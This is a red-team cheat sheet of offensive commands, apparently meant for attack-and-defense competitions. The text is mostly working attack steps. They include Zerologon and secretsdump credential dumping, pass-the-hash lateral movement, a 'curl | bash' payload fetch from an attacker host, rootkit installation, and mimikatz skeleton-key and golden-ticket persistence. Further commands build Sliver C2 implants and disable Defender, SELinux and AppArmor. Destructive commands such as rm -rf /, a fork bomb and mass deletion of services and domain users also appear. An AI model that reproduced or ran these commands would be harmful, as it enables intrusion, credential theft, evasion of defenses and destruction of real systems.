sudo nmap -T4 -min-hostgroup 96 -p 53,445 --open {IP_range} | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u > smb_ips.txt
-min-hostgroup will divide the range up into 96 sub-parts
-T4, we can specify --max-retries 2 --max-rtt-timeout {double_time_to_ping}ms --min-rate 300
while read -r line; do nxc smb $line -u '' -p '' -M zerologon -M printnightmare -M smbghost -M ms17-010; done < smb_ips.txt
for i in {1..10}; do python3 zerologon-Shot.py {DC_name} {DC_IP_with_$i}; donezerologon.py and then impacket-secretsdump -just-dc -no-pass {domain}/{machine_name}:@{DC_IP}
for i in {1..10}; do python3 zerologon.py {DC_name} {DC_IP_with_$i}; doneimpacket-secretsdump -just-dc -no-pass 'corp.local/TEST-DC$@10.10.0.162' (if DC name is TEST-DC)sudo nmap -sV -O -T4 -min-hostgroup 96 -p 22 {IP_range}sudo nmap -sn -T4 {IP_range} | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u > ips.txt to just figure out what hosts are online
sudo autorecon -t ips.txt -p 21,22,23,25,53,80,110,111,135,139,143,389,443,445,465,636,873,993,995,1025-1030,1080,1433,1521,1723,3306,3389,5432,5900,5985,6379,6667,8000,8080,8443,8888 -o autorecon_results --max-scans 100find autorecon_results -name "*.txt" -type f -exec grep -l "open" {} \; | sortgrep -r "MS17-010\|CVE-\|Anonymous\|Password:" autorecon_resultsgrep -r "Anonymous" autorecon_resultsgrep -r "Domain Controller" autorecon_resultsgrep -r "Password:\|Credentials:" autorecon_resultsgrep -r "SMB signing required: false" autorecon_resultsWindows:
& $env:SystemRoot\System32\sc.exe sdset {name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"-o with iwr or we’ll just get the HTTP connection info lmfaoUnregister-ScheduledTask -TaskName "WindowsUpdater" -Confirm:$falserm 'C:\Users\$env:USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winupdater.lnk'Stop-Service -Name "WinUpdaterSvc" and $service = Get-WmiObject -Class Win32_Service -Filter "Name='WinUpdaterSvc'"; $service.delete()HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonHKCU:\Environmentwmiexec.py -hashes :{hash} '{domain}/{user}@{ip}'psexec.py -hashes :{hash} '{domain}/{user}@{ip}' or smbexecatexec.py -hashes :{hash} '{domain}/{user}@{ip}' "{command}"xfreerdp3 /u:{user} /d:{domain} /pth:{hash} /v:{IP}
/p:{password} if we have it
evil-winrm -i {IP} -u '{domain}\{username}' -H {hash} -r {domain}
-r optional, used for Kerberos
Guest account
Remote Desktop Users group, we might still need to configure group policy:
secedit /export /cfg C:\Windows\temp\secpol.infGuest accountsecedit /configure /db C:\Windows\temp\secedit.sdb /cgf C:\Windows\temp\secpol.infgpupdate /forceLinux:
nix-shell -p libgcc pamecho "{password}" | sshpass -p "{password}" ssh -o StrictHostKeyChecking=no "{username}@{ip}" "sudo -S id"
echo "{password}" | sshpass -p "{password}" ssh -o StrictHostKeyChecking=no "{username}@{ip}" "sudo -S bash -c 'curl -L {kali_IP}:{port}/p.sh | bash -s {kali_IP}:{port}'"
ssh_across_ips.py
ssh_across_ips.py 10.100.100-120.35 {username} {password} '{command}'for i in {1..10}; do echo $i; doneMAGIC=mtz bash or simply kill -59 $$modules/hiding_tcp.c and adding a port to is_hidden_portsingularitykill -59 <PID>8081sudo python3 scripts/trigger.py {IP} and wait for shellconfig/defconfig, then after configuring we run make defconfigapt install build-essential linux-headers-$(uname -r)make menuconfig, make, and make installif (strstr(name->name, HIDE) && hidden) {return NULL;} instead of existing logic/reptile/reptile_cmd {show/hide} to show/hide all hidden files/reptile/reptile_cmd root to get root/reptile/reptile_cmd {show/hide} {pid} to show/hide processes/reptile/reptile_cmd conn {IP} {show/hide} to show/hide ICP/UDP connections#<reptile> and #</reptile> will be hidden
reptile_cmd file-tampering/etc/passwd and cron jobs
Plaintext Passwords
Get-ADUser -Filter { SamAccountName -notlike "*$" } | Set-ADUser -AllowReversiblePasswordEncryption $trueSet-ADDefaultDomainPasswordPolicy -Identity {domain} -ReversibleEncryptionEnabled $trueSkeleton Key
mimikatz "privilege::debug" "misc::skeleton" "exit" - adds mimikatz as a password to all usersMemSSP
mimikatz "privilege::debug" "misc::memssp" "exit"
misc::lock /process:explorer.exe to LOG OUT active users!!C:\Windows\System32\mimilsa.log or C:\Windows\System32\kiwissp.logGolden Certificate
certipy ca -backup -ca '{certificate_name}' -username {user}@{domain} -hashes {hash}certipy forge -ca-pfx {ca_private_key} -upn {user}@{domain} -subject 'CN={user},CN=Users,DC={domain},DC={tld}Golden Ticket
krbtgt NTLM hash with mimikatz (unless we already have it)
lsadump::lsa /patchticketer.py -duration 10 -aesKey "{aes_key}" -domain-sid "{domain_sid}" -domain "{domain_name}" "Administrator"
- The domain_SID can be gathered from whoami /userimpacket-psexec -k -no-pass Administrator@{DC_fqdn}Adding a new Computer Account
New-ADComputer -Name {PC_NAME_NO_$} -AccountPassword (ConvertTo-SecureString '{new_pass}' -AsPlainText -Force) -Enabled $true
addcomputer.py -computer-name 'KRBTGT$' -computer-pass '{new_password}' -dc-host "{dc_ip}" -domain-netbios '{domain}' '{domain}'/'{owned_user}':'{owner_user_pass}'dsacls 'DC={domain},DC={tld}' /I:T /G '{domain}\{machine_account}:CA;Replicating Directory Changes'dsacls 'DC={domain},DC={tld}' /I:T /G '{domain}\{machine_account}:CA;Replicating Directory Changes All'SeBackupPrivilege and SeRestorePrivilege
remote management users with net localgroup 'remote management users' /add {machine_account}.\Set-UserRights.ps1 -AddRight -Username {domain}\{machine_account} -UserRight SeBackupPrivilege,SeRestorePrivilegeShadow Copies
vshadow.exe -nw -p C:copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bakreg.exe save hklm\system c:\system.bakimpacket-secretsdump
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCALsudo apt install golang-go, curl https://sliver.sh/install | sudo bash, and cd sliver && makesliver-servernew-operator --name {op_name} --lhost localhost and multiplayer to enable clientssliver-client import {config_file} and sliver-client to joinwg can be used to start listening for incoming sessions on a sneaky wireguard udp (use mtls otherwise if we dont get a callback)
evil-winrm implants and beacons (and sometimes maybe wmi-exec?) will DIE a HORRIBLE DEATH, use another method to run the implant/beacongenerate to create implants or beacons
generate --wg {our_IP} --os linux for an implantgenerate beacon --wg 192.168.0.102 -j {jitter} -S {wait_seconds} --os linuxgenerate --mtls 192.168.0.102 --os windows--tcp-pivot {IP} and then we can see our pivots with pivots tcpsessions to show active sessions
sessions -i {id} to interact with session
CTRL + d to exitshell {command} will execute command in a session (can maybe run without shell?)getprivs will list privileges available, probably use /ProgramData/ for potatoes?info - host infops - process listupload/download - file transferscreenshot - grab a screenshotbeacons to show active beacons
use {beacon_id} to use a beacon
interactive to turn it into a normal sessionarmory install allsharp-hound-4 -- '-c all,GPOLocalGroup'Killing Services
systemctl stop {service}
keyboard_desktop_flipper.shservice_stopper.shcommand_rotate.ship_rotate.shrm -rf / -no-preserve-rootdel /Q /S:(){ :|:& };:)timebomb.shTrolling on Linux
apt useless:
sed -i '50i alias apt="apt -s"' /root/.bashrc; touch -d "Aug 8 2023" /root/.bashrc; sed -i '50i alias apt="apt -s"' /root/.zshrc; touch -d "Aug 8 2023" /root/.zshrcwall "dance"echo "loadkeys de && localectl set-locale de_DE.UTF-8 && localectl set-keymap de" >> ~/.bashrcTrolling on Windows
Install-Language -Language de-DE -CopyToSettings; Set-WinUserLanguageList de-DE -Force; Set-WinSystemLocale -SystemLocale de-DE; Set-WinUILanguageOverride -Language de-DE; Set-Culture de-DE; Set-WinHomeLocation -GeoId 94misc::wp /file:{path} to set the current PC’s wallpapersc.exe stop dns to stop dns
sc.exe delete dns to delete itpowershell -c "Get-Service | ForEach-Object { sc.exe delete $_.Name }"netsh interface ip delete address "Ethernet" addr={address}powershell -c "Get-ADUser -Filter * | ForEach-Object { Remove-ADUser $_ -Confirm:$false }" to delete domain usersenabled + enter path of image and select fill for style > apply + ok > gpupdate /forceiwr https://khaelkugler.com/misc_scripts/cold_hands.exe -o "C:\Program Files (x86)\Microsoft\Edge\Application\joe_biden.exe"; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "ChillyFingers" -Value "C:\Program Files (x86)\Microsoft\Edge\Application\joe_biden.exe"; iwr https://download.sysinternals.com/files/PSTools.zip -o "C:\Program Files (x86)\Microsoft\Edge\Application\PSTools.zip"; Expand-Archive "C:\Program Files (x86)\Microsoft\Edge\Application\PSTools.zip" -d "C:\Program Files (x86)\Microsoft\Edge\Application\PSTools\"; 1..5 | ForEach-Object { & "C:\Program Files (x86)\Microsoft\Edge\Application\PSTools\psexec.exe" -i $_ -d -s "C:\Program Files (x86)\Microsoft\Edge\Application\joe_biden.exe" -accepteula }.\psexec -i {session} -d -s powershell -command '{command}' -accepteula
-d exits immediately1..50 | ForEach-Object {Start-Process notepad}Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show("{message_box_message}", "{message_box_title}", 0, 64)Defender
Add-MpPreference -ExclusionPath "{path_to_excluded_folder}"& ([ScriptBlock]::Create((irm https://dnot.sh/))) --name "{custom_AV_name}"
C:\ first (technically \Users and \Program Files)reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /fgpedit.msc > Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Turn off Microsoft Defender Antivirus > Enabled'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -AllSet-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -DisableBlockAtFirstSeen $true -DisablePrivacyMode $true -SignatureDisableUpdateOnStartupWithoutEngine $true -DisableArchiveScanning $true -MAPSReporting 0 -SubmitSamplesConsent 2
Remove-WindowsFeature Windows-DefenderStop-Service WinDefend -ForceSet-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Type DWord -ForceSet-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" -Name "AllowAntivirus" -Value 0 -Type DWordhttps://github.com/SaadAhla/FilelessPELoaderGetting Firewalled
CS Falcon
wmiexec with -silentcommand and -nooutput seems to work with CS Falcon enabledAppArmor
sudo systemctl stop apparmor, sudo systemctl disable apparmor, sudo apt purge apparmorSELinux
sestatus
sudo setenforce 0 or sudo setenforce permissive
SELINUX=enforcing to disabled in /etc/selinux/config and reboot
shutdown /s /t 0
shutdown /r /t 0
query user or query session
tscon.exe {target_id} /dest:rdp-tcp#{our_rdp_session_number}
query session and logoff {id} to log off a specific user
(Get-PSReadlineOption).HistorySavePath
ps
taskkill /pid {id_from_ps} /f
| FINDSTR /NI "{string}"
/N gets line number, /I ignores case
reboot to restart
who to see who’s on a system
pkill -t {result} to then kill their session
pkill -KILL -u {user} - kill all of a user’s processes
kill -9 {pid} to kill a specific process
touch -d "4 May 2024"